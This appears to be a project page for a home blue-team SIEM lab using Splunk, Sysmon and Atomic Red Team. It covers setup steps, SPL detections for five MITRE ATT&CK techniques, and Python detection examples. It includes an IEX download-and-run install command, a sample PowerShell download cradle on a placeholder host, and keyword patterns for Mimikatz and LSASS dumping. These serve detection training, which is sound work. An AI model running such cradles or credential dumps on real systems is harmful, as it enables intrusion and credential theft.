SOC ANALYST HOME LAB — TIER 1

HOME SIEM LAB

Splunk · Sysmon · Atomic Red Team · MITRE ATT&CK

Windows 10 · VirtualBox · Splunk 10.2.2 · Sysmon v15 · 5 detections · Free tools
49 threats detected · 5 MITRE techniques · 6 dashboard panels · 12h build time

What is this lab?

A fully functional home SIEM environment that simulates a corporate blue team setup — built entirely with free tools on a single machine. Designed to develop real SOC analyst skills through hands-on attack simulation and detection engineering.

🖥️
HOST MACHINE
Splunk Enterprise
SIEM brain — receives, indexes and searches all logs. Free tier handles 500MB/day — more than enough for a home lab.
💻
VIRTUAL MACHINE
Windows 10 VM
Isolated victim endpoint running in VirtualBox. Generates real security logs while keeping your host machine safe.
👁️
LOG AGENT
Sysmon v15
Deep telemetry engine — captures every process, network connection, file creation, and registry change with SwiftOnSecurity config.
📡
LOG SHIPPER
Universal Forwarder
Lightweight agent that collects logs from the VM and ships them to Splunk on port 9997. Must run as SYSTEM for Sysmon access.
⚔️
ATTACK SIMULATOR
Atomic Red Team
Library of real MITRE ATT&CK technique simulations. One command generates authentic attack telemetry without guesswork.
🔍
DETECTION ENGINE
Custom SPL Queries
Hand-written Splunk search queries that detect brute force, PowerShell abuse, credential dumping, and more.

Four phases to a working SIEM

Each phase below lists the full build steps. Follow in order — each phase depends on the previous one being complete.

P1 Environment Setup — VirtualBox + Windows 10 VM ✓ COMPLETE
virtualbox setup
# Install VirtualBox + Extension Pack from virtualbox.org
# Download Windows 10 Enterprise ISO from microsoft.com/evalcenter
# Create VM: Name=Windows10-Victim, RAM=4096MB, Disk=60GB
# Install Windows — use "Domain join" to skip Microsoft account
01. Download VirtualBox (Windows hosts) + Extension Pack from virtualbox.org — install both
02. Download Windows 10 Enterprise ISO (90-day eval) from microsoft.com/en-us/evalcenter
03. Create VM: Name=Windows10-Victim, Type=Windows 10 64-bit, RAM=4096MB, Disk=60GB
04. Tick Skip Unattended Installation — Start VM → install Windows → use "Domain join instead" for local account
05. Install Guest Additions: Devices → Insert Guest Additions CD → run VBoxWindowsAdditions.exe → Reboot
06. Take a snapshot: Machine → Take Snapshot → Name: Clean-Install
💡 If Windows installer says "No driver found" — go to VM Settings → Storage → change controller from NVMe to SATA (AHCI)
P2 Log Ingestion Pipeline — Splunk + Sysmon + Forwarder ✓ COMPLETE
inputs.conf — C:\Program Files\SplunkUniversalForwarder\etc\system\local\

[WinEventLog://Security]
disabled = 0
index = windows
renderXml = false

[WinEventLog://Microsoft-Windows-Sysmon/Operational]
disabled = 0
index = sysmon
renderXml = false
01. Install Splunk Enterprise on host PC → open http://localhost:8000
02. Settings → Forwarding and Receiving → Configure Receiving → New Receiving Port: 9997
03. Settings → Indexes → create index windows and index sysmon
04. Run ipconfig on host PC → note the VirtualBox Host-Only Network IPv4 address
05. Inside VM: install Splunk Universal Forwarder → Receiving Indexer = your host IP, port 9997
06. Open Notepad as Administrator → create inputs.conf at the path shown above
07. Install Sysmon: sysmon64.exe -accepteula -i sysmonconfig-export.xml (use SwiftOnSecurity config)
08. Critical: services.msc → SplunkForwarder → Properties → Log On → Local System account → Restart
⚠️ The Local System account step is critical. Without it, the Forwarder cannot read Sysmon's protected log channel and index=sysmon will always be empty.
P3 Attack Simulation & Detection — Atomic Red Team + SPL ✓ COMPLETE
PowerShell (Admin) — Atomic Red Team Install

# Step 1: Allow scripts
Set-ExecutionPolicy Bypass -Scope CurrentUser -Force

# Step 2: Fix NuGet
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force
Install-Module -Name powershell-yaml -Force -AllowClobber

# Step 3: Install
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing)
Install-AtomicRedTeam -getAtomics -Force

# Step 4: Import (every session)
Import-Module "C:\AtomicRedTeam\invoke-atomicredteam\Invoke-AtomicRedTeam.psd1" -Force

See the Detections section below for all 5 SPL queries and what they catch.

P4 SOC Dashboard — 6 Panel Real-Time Monitoring View ✓ COMPLETE
01. Splunk → Dashboards → Create New Dashboard → Title: SOC Detection Lab → Classic Dashboard
02. Panel 1 — Single Value: total threat events (EventCode 4625, 4720, 4732, mimikatz/lsass/net user commands)
03. Panel 2 — Bar Chart: top targeted accounts (EventCode 4625 grouped by Account_Name)
04. Panel 3 — Line Chart: suspicious PowerShell activity over time (timechart span=1h)
05. Panel 4 — Table: backdoor account activity (EventCode 4720 + 4732 with human-readable action labels)
06. Panel 5 — Table: credential dumping attempts (CommandLine containing lsass/mimikatz/procdump)
07. Panel 6 — Area Chart: overall attack timeline (all threat events, timechart span=30m)
The area chart timeline is the most powerful visual — a flat baseline with sudden spikes shows attack activity at a glance. That's what the dashboard produced in this lab.

5 MITRE ATT&CK detections

Each detection simulated with Atomic Red Team, caught with a custom SPL query, and verified with real log output in Splunk.

T1087.001 — DISCOVERY
Account Discovery
POST-EXPLOITATION RECON
Detects classic post-compromise reconnaissance — whoami, net user, and net localgroup executed from PowerShell. 3 events caught within seconds of simulation.
index=sysmon EventCode=1 | search CommandLine="*net user*" OR CommandLine="*whoami*" OR CommandLine="*net localgroup*" | table _time, host, User, CommandLine, ParentCommandLine | sort - _time
MEDIUM
T1110.001 — CREDENTIAL ACCESS
Brute Force Attack
PASSWORD GUESSING
Detects repeated failed logins against local accounts. Field names in Splunk differ from raw Windows logs — use Account_Name and Logon_Type, not user and LogonType.
index=windows EventCode=4625 | stats count by Source_Network_Address, Account_Name, host, Logon_Type | where count > 3 | sort - count
HIGH
T1059.001 — EXECUTION
Suspicious PowerShell
LIVING OFF THE LAND
Catches 8 malicious PowerShell patterns including Invoke-Mimikatz download cradle, encoded commands, execution policy bypasses, and offensive toolkit enumeration.
index=sysmon EventCode=1 Image="*powershell.exe*" | eval suspicious=if(match(CommandLine, "(?i)(-enc|-EncodedCommand|-ExecutionPolicy Bypass|IEX|DownloadString|WebClient)"), "YES", "NO") | where suspicious="YES" | table _time, host, CommandLine
CRITICAL
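An added Python example, not part of the lab's own queries or code: it applies the T1059.001 pattern above to constructed Sysmon EID 1 command lines, and additionally decodes any -EncodedCommand payload so the pattern is also checked against what actually ran (something the raw CommandLine match cannot see when the short "-e" form is used). The sample command lines, the download URL on the reserved example.invalid host, and the helper names are all constructed for this example.

```python
import base64
import re

# The lab's T1059.001 pattern (the SPL regex above, with its line-wrap spaces removed).
SUSPICIOUS_RE = re.compile(
    r"(-enc|-EncodedCommand|-ExecutionPolicy Bypass|IEX|DownloadString|WebClient)", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_ARG_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_powershell(script):
    """UTF-16LE + base64, the -EncodedCommand format; used here only to build sample data."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if the command line has none."""
    m = ENCODED_ARG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # not real base64 / not UTF-16: fall back to raw match
        return None


def classify(cmdline):
    """Mirror of the SPL eval suspicious=if(match(...)), run over the raw line AND the decoded payload."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    matched = sorted({m.lower() for m in SUSPICIOUS_RE.findall(haystack)})
    return {"verdict": "YES" if matched else "NO", "matched": matched, "decoded": decoded}


# Constructed Sysmon EID 1 CommandLine values (the URL host is the reserved .invalid TLD).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_COMMANDLINES = [
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Users\\lab\\script.ps1",  # raw pattern hit
    "powershell.exe -NoP -W Hidden -e " + encode_powershell(CRADLE),             # hit only after decoding
    "powershell.exe Get-ChildItem C:\\Logs",                                     # benign
]

if __name__ == "__main__":
    for line in SAMPLE_COMMANDLINES:
        result = classify(line)
        print(result["verdict"], result["matched"], (result["decoded"] or "")[:60])
```

Note that "-ExecutionPolicy Bypass" alone is also how many legitimate admin scripts are launched, so in a real SOC that token is better used for scoring than as a standalone alert.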
T1136.001 — PERSISTENCE
Backdoor Admin Account
LOCAL ACCOUNT CREATION
Caught 4 backdoor admin accounts created in 46 seconds. Correlates EventCode 4720 (account created) with 4732 (added to Administrators) — the classic attacker persistence pattern.
index=windows (EventCode=4720 OR EventCode=4732) | eval action=case( EventCode=4720, "New Account Created", EventCode=4732, "Added to Administrators") | table _time, host, Account_Name, action, src_user | sort - _time
CRITICAL
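An added Python example covering both the T1110.001 brute-force query and the T1136.001 backdoor-account query above; it is not the lab's own code. It reproduces the "count > 3" threshold over constructed 4625 events and, going one step beyond the lab's query, actually pairs a 4720 with a later 4732 for the same account inside a time window instead of only labelling the two event codes. It assumes, as the lab's query does, that Account_Name on the 4732 carries the member that was added; the events, host name, addresses and account names are constructed.

```python
from collections import Counter
from datetime import datetime, timedelta


def ev(t, code, acct, src="192.168.56.1", logon=3, src_user="lab"):
    """Build one event with the Splunk field names the lab's queries use (constructed data)."""
    return {"_time": t, "EventCode": code, "Account_Name": acct, "host": "WIN10-VICTIM",
            "Source_Network_Address": src, "Logon_Type": logon, "src_user": src_user}


# Constructed Windows Security events: 5 failed logons for "admin" from one source, a single
# failure for "bob", a backdoor account made admin 46 s after creation, and a slow benign case.
SAMPLE_EVENTS = [ev(f"2026-04-10 09:00:0{i}", 4625, "admin") for i in range(5)] + [
    ev("2026-04-10 09:00:30", 4625, "bob", src="192.168.56.20"),
    ev("2026-04-10 09:05:00", 4720, "svc_backup"),
    ev("2026-04-10 09:05:46", 4732, "svc_backup"),
    ev("2026-04-10 11:00:00", 4720, "newhire"),
    ev("2026-04-10 13:00:00", 4732, "newhire"),   # two hours later: outside the default window
]


def ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def brute_force(events, threshold=3):
    """T1110.001: the SPL 'stats count by ... | where count > 3' as a Counter over 4625 events."""
    counts = Counter((e["Source_Network_Address"], e["Account_Name"], e["host"], e["Logon_Type"])
                     for e in events if e["EventCode"] == 4625)
    return {key: n for key, n in counts.items() if n > threshold}


def backdoor_accounts(events, window_minutes=10):
    """T1136.001, one step beyond the SPL: pair a 4720 with a later 4732 for the same account
    inside the window, so an account creation that is never made admin is not flagged."""
    created, hits = {}, []
    for e in sorted(events, key=lambda e: ts(e["_time"])):
        if e["EventCode"] == 4720:
            created[e["Account_Name"]] = e
        elif e["EventCode"] == 4732 and e["Account_Name"] in created:
            c = created[e["Account_Name"]]
            delta = ts(e["_time"]) - ts(c["_time"])
            if delta <= timedelta(minutes=window_minutes):
                hits.append({"account": e["Account_Name"], "created_by": c["src_user"],
                             "seconds_to_admin": int(delta.total_seconds())})
    return hits


if __name__ == "__main__":
    print(brute_force(SAMPLE_EVENTS))
    print(backdoor_accounts(SAMPLE_EVENTS))
```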
T1003.001 — CREDENTIAL ACCESS
Credential Dumping
LSASS MEMORY DUMP
17 events caught: Mimikatz direct execution, Invoke-Mimikatz in-memory, ProcDump LSASS dump, comsvcs.dll LOLBin, and xordump. The query keys on EventCode 1 (process create) rather than EventCode 10 (process access) because of the Sysmon config in use.
index=sysmon EventCode=1 | search CommandLine="*lsass*" OR CommandLine="*mimikatz*" OR CommandLine="*sekurlsa*" OR CommandLine="*procdump*" | table _time, host, User, CommandLine | sort - _time
CRITICAL

Key Windows Event IDs

The most important Event IDs every SOC analyst should memorise. Sourced from both Windows Security log and Sysmon.

EVENT ID | LOG SOURCE | MEANING | WHY IT MATTERS
4624 | Security | Successful logon | Baseline — track normal login patterns, spot off-hours access
4625 | Security | Failed logon | Brute force detection — high count in short window = attack
4648 | Security | Logon with explicit credentials | Pass-the-hash, lateral movement indicator
4672 | Security | Special privileges assigned | Admin logon — alert on unexpected accounts
4720 | Security | User account created | Backdoor account creation — always investigate
4732 | Security | User added to security group | Privilege escalation — especially Administrators group
4776 | Security | NTLM credential validation | Credential attacks — watch for failures and off-network sources
1 | Sysmon | Process created | Everything that launches — core detection source for all attacks
3 | Sysmon | Network connection made | C2 beaconing, data exfiltration, lateral movement
10 | Sysmon | Process accessed another process | LSASS access = credential dumping attempt
11 | Sysmon | File created | Malware dropping files, ransomware encryption activity
13 | Sysmon | Registry value set | Persistence mechanisms — run keys, service installs

Technique coverage

All 5 detections mapped to the MITRE ATT&CK Enterprise framework — the industry standard for categorising adversary behaviour.

T1087.001
Account Discovery: Local Account
Tactic: Discovery
► Sysmon EID 1
T1110.001
Brute Force: Password Guessing
Tactic: Credential Access
► Windows Security EID 4625
T1059.001
Command & Scripting: PowerShell
Tactic: Execution
► Sysmon EID 1
T1136.001
Create Account: Local Account
Tactic: Persistence
► Windows Security EID 4720+4732
T1003.001
OS Cred Dumping: LSASS Memory
Tactic: Credential Access
► Sysmon EID 1 / 10

When things break

Every issue encountered during this lab build, with exact fixes. If you hit something not listed here, open a GitHub issue.

PROBLEM: No driver found during Windows install
CAUSE: VirtualBox using NVMe storage controller which Windows installer doesn't have drivers for
FIX: Settings → Storage → remove NVMe controller → add AHCI (SATA) controller → re-attach VDI and ISO

PROBLEM: index=windows returns no results
CAUSE: The "windows" index was never created in Splunk — events arrive and get dropped
FIX: Settings → Indexes → New Index → name: windows → Save. Check Messages for "dropped events" errors.

PROBLEM: index=sysmon returns no results
CAUSE: SplunkForwarder running as a limited service account — cannot read Sysmon's protected log channel
FIX: services.msc → SplunkForwarder → Properties → Log On tab → Local System account → Apply → Restart

PROBLEM: Splunk not loading on port 8000
CAUSE: SplunkD service stopped (common after PC restart)
FIX: services.msc → SplunkD → Start. Or: cmd as admin → cd "C:\Program Files\Splunk\bin" → splunk start

PROBLEM: Forwarder not shipping logs
CAUSE: inputs.conf saved as .txt instead of no extension, or saved without admin rights
FIX: Open Notepad as Administrator → File → Save As → navigate to path → File type: All Files → filename: inputs.conf

PROBLEM: Atomic Red Team install fails with powershell-yaml error
CAUSE: NuGet package provider not configured — PSGallery can't resolve the module
FIX: Install-PackageProvider -Name NuGet -Force, then Install-Module powershell-yaml -Force -AllowClobber

PROBLEM: T1087 atomic test shows "yaml does not exist"
CAUSE: Atomics folder didn't download correctly during initial install
FIX: Install-AtomicRedTeam -getAtomics -Force -InstallPath "C:\AtomicRedTeam"

PROBLEM: VM window too small / mouse gets stuck
CAUSE: VirtualBox Guest Additions not installed
FIX: Devices → Insert Guest Additions CD Image → run VBoxWindowsAdditions.exe inside VM → Reboot
Feroz Khan
SOC ANALYST IN TRAINING — CYBERSECURITY

Building practical cybersecurity skills through hands-on home lab projects.

LICENSE
MIT
FRAMEWORK
MITRE ATT&CK Enterprise
COMPLETED
April 2026
TOOLS
All Free & Open Source